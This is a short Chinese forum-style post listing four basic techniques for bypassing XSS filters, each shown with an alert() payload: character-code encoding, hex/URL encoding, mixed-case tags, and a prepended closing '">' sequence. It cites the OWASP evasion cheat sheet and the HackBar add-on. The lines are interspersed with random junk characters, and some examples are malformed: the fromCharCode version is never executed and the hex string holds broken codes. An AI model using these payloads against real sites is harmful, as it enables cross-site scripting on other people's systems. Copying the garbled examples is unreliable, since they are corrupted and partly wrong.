四种超级基础的绕过方法。
- y; j! j; ~8 A: T( p: _" t0 G1.转换为ASCII码3 j! \* @* P: J% W+ n) |% \- h
例子:原脚本为<script>alert(‘I love F4ck’)</script >
/ F* Y. Y3 K# O通过转换,变成:
7 R _2 F" ?8 _- w<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
" k* j3 s9 @1 T& z 4 e, c/ \5 K& O3 P9 n1 _
2.转换为HEX(十六进制); g' G6 A u) f# M
例子:原脚本为<script>alert(‘I love F4ck’)</script>
! S: k) z. G1 x# I/ }/ |3 |通过转换,变成: Y0 j K3 @3 E. D: D/ y$ S4 m
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e! O8 ]6 ~0 ?+ ]+ w% B- G c
( s+ h# _* f4 ?7 l: `, y. c3.转换脚本的大小写
! Y1 r1 D( q( Q* r例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 ^- h0 a0 H5 l' c E7 T1 s o5 p转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>4 J5 H* x! d" R3 {. L! C! t
5 R2 S; R! d7 C# i' z4.增加闭合标记”>
6 B9 y2 c! X2 c" s5 o- I& J2 ?例子:原脚本为<script>alert(‘I love F4ck’)</script>
E) I f0 O: W2 G+ b* c* s转换为:”><script>alert(‘I love F4ck’)</script>
( v d3 B% f/ q! p1 m更详细绕过技术请参考此网页* t: L* W9 j- i: d
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet5 T. U- Y' `1 u% C4 h# y( T! P9 G
. q2 i' e$ c' {6 J1 l% f. ]
转换工具使用的是火狐的 hackbar mozilla addon. |